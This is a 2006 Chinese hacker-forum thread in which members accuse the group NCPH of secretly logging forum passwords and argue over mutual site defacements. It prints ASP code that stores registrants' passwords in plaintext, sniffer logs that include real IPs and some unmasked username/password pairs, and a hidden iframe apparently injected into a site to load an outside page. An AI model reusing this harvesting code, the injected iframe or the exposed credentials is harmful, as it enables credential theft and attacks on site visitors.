文章作者：看看这个N.C.P.H是个什么鸟

全部个人观点 不代表任何组织 有啥墨迹的跟俺一个人说

前几天有个傻B把BCT的首页替换了,很叼是不?还要帮别人做广告,你这样的殷勤没人领情的,那么看看你们自己是个什么货色吧!
这是在他们网站上的登陆页面找到的代码

复制内容到剪贴板

代码:

set conn=server.createobject("adodb.connection")
conn.connectionstring="Provider = Microsoft.jet.OLEDB.4.0 ; Data Source = "& Server.Mappath ("ncphbbs/user.asp")
conn.open
sqltj="insert into username1 (strUsername,strPassword)values('"&strUsername&"','"&strPassword&"')"
conn.execute(sqltj)
Else
  intForumID = 0
End If

明白的朋友知道这是做什么的,不明白的朋友我就给解释一下,你在论坛注册之后你的帐号密码会被记录在数据库里,注意是明文记录的,这意味着什么,只要你在这里有点不小心,很可能你的QQ 你的内部帐号以及其他种种机密都会泄露,也难怪有的内部论坛信息外泄了.
好了,这是不是没什么?那在看看另外一个秘密
这家伙对自己服务器上的,以及同网段的其他机器也不放过,在一个隐蔽目录里发现如下好东西

复制内容到剪贴板

代码:

pass.txt
Password:20023118
Username:
Password:
Username:qqqwww
Password:qqqwww
Username:cql_0981
Password:3330981
Username:cql_0981
Password:3330981
Username:


pass.log
TCP [06/30/06 16:52:54]
125.73.131.188->222.186.81.2 Port: 48938->80
HOST: babyjh.com USER: %D3%F1%B6%F9****%D3%C6, PASS: dss****5
TCP [06/30/06 19:11:09]
61.147.149.130->222.186.81.2 Port: 13054->21
PASS yuyingqicom1****

TCP [06/30/06 19:12:00]
61.147.149.130->222.186.81.2 Port: 13056->21
USER anon****

TCP [06/30/06 19:12:00]
61.147.149.130->222.186.81.2 Port: 13057->21
USER ano****s

TCP [06/30/06 19:12:07]
61.147.149.130->222.186.81.2 Port: 13058->21
USER m****

不明白的话我也解释一下,这是嗅叹本段下的敏感密码 牛B吧,据说还是朋友服务器,那更牛B了
传个图作个证据

NCPH人品不好，居然还在自己站点记录用户密码，呵呵，以此推出，他们的软件里面很可能也有后门，那用过他们软件的人自己小心咯，哈哈
记得EST要求的贵宾首先是人品，貌似NCPH的人在EST还是荣誉会员组的，希望管理员考虑下撤销之

B.C.T放在虚拟服务器上，没办法设置。被替换也可以说没办法。
但至少不会象NCPH那样记录别人的密码。貌似2楼的很同意这样的做法，也属于这类人？

打来打去有什么意思啊，你入侵我，我入侵你，结果侵来侵去就是网上那些免费的脚本程序，只要重要数据不被破坏一笑了之吧。明文保存密码是他的权利，大家不上他的网就行了，再说有谁只用一个密码的啊，自己的安全自己负责。

[s:82] 引用某马甲的一句话“真是人贱无敌啊”对了，顺便问句，NCPH是什么东东。？

我靠，一段时间不来EST一来就/。///

剑心``有点火气了啊/


      ```呵呵

♪我鄙视♪

希望N.C.P.H的成员能出来做一下解释。

把黑别人站点当作宣传站点技术的方式 是一种愚昧的表现  

追求技术 倡导原创  本着这样的理念  去做一些小动作 呵呵

何为技术 何为原创  ...?    哲学好好学一下吧 !!

哈 剑心确实要怒了~~~~ 不过好象NCPH的还没承认吧  有朋友说可能是冒充  但愿吧！ [s:52]

以个人名义先支持一下BCT的兄弟

我说上次去 BCT 找篇文章的时候，怎么发现变成 宣传 N.C.P.H 的了。。

当时也没多想什么  就退出来了。。没把这事放在心上。。原来是这么回事啊。。

我相信剑心的人品。。。和 sunwear 一样。。以个人名义 支持 剑心。。。

中国牛黑之一的剑心火了，小心人家一剑刺穿你心 [s:77]
NCPH我不是很了解，所以我也不能说什么，而上文说的嗅探什么的也可能是别的来参观游览的人放的，中国的几个安全团队里面人也不少，肯定素质良莠不齐，而且还不乏挑衅离间之辈，剑心还是慎重点吧

我也相信Bug.Center.Team  相信h4k_b4n所领导的小组  相信玄猫等成员
EST论坛贵宾:“凋凌玫瑰”不就是N.C.P.H的人吗？他有必要出来解释一下吧

好热闹啊~我现在虽然不是N.C.P.H的成员了，但还是想说几句公道话。

to bct:

bct被黑很正常啊，所谓树大招风，有几个所谓的“黑客”站点没被黑过呢。你们骂来骂去有意思么，还帖个shell出来。是谁的人品有问题啊，黑就黑呗，有能耐就别被黑啊，这点道理连小p孩都知道，说白了，还不是要面子啊。

to ncph:

记录别人的密码的确是可耻的，不晓得事情的真相，所以无发言权了。如果真是这样，那我离开ncph是对的。

以上代表个人观点。

现在 NCPH 论坛顶上
<iframe height=0 width=0 src="http://www.yeworld.net/Text/Lib.Html"></iframe>

                建议挂个DIRshell 比较爽!

不支持楼上的建议哦...你挂个dirshell造成破坏的对象不止是NCPH的人..
而是连无辜的网民也一起被害..

我认识那个凋零玫瑰...他人还是不错的....我个人感觉这件事应该不是他所为...不过记录明文密码就不应该了..不知道程序是不是他们自己写的..故意这样的..

Bug.Center.Team现在的数据好象没了..是不是他们的人删的?

剑心的那个shell不错..去angel的站点下了个2006的..可惜跟你的不一样..难道是内部版?不知可否放出来用下呢?

我现在来看看～！

真的挺没劲的..

题外话：
记得原来八进制出了一点问题的时候。有人发帖子说这个事情。
执行管理EvilOctal好像说，希望认识那个进入的人，并请他指导交流。
那个贴子我找不到了。可惜。

bct好像也出了一点小问题。他们这么说，http://www.cnbct.org/

引用:

Because servers were attacked, temporarily unable to visit . Maybe Someone will so happy for this.

Anyway,Hei "Hacker" Maybe you will say:" Bug.Center.Team Is So Bad!" But You Too.

NCPH? Just Your Mother Fucker .in China Your Team Just ASS Hole

看来矛盾很大了。bct好像一直以来以擅长web漏洞攻防享誉。
而ncph好像重点不在web。
所以感觉即使ncph主页出问题也没有bct主页出问题震撼。
破坏容易，建造艰难。
个人表示遗憾。祝福早些恢复。

引用:

这里是引用第[22 楼]的fhod于2006-07-25 22:31发表的：
不支持楼上的建议哦...你挂个dirshell造成破坏的对象不止是NCPH的人..
而是连无辜的网民也一起被害..

我认识那个凋零玫瑰...他人还是不错的....我个人感觉这件事应该不是他所为...不过记录明文密码就不应该了..不知道程序是不是他们自己写的..故意这样的..

.......

http://www.loveshell.net/blog/blogview.asp?logID=119

不知道这个算不算是回复了！哈哈哈～～～～～人也会有看错的一天！这个可能是你的转折点

AW:NCPH？我知道，而且也知道你们很厉害！那也不难怪！你们是SK当中的CR（Changer/Copyer）～我们只是SK～比不上你N份之一。不过说实在的！黑我们站～也太无聊了！有种就去黑了破庙！不就是无聊所作～唉～～～～～喜欢做秀而已嘛，我知道的了！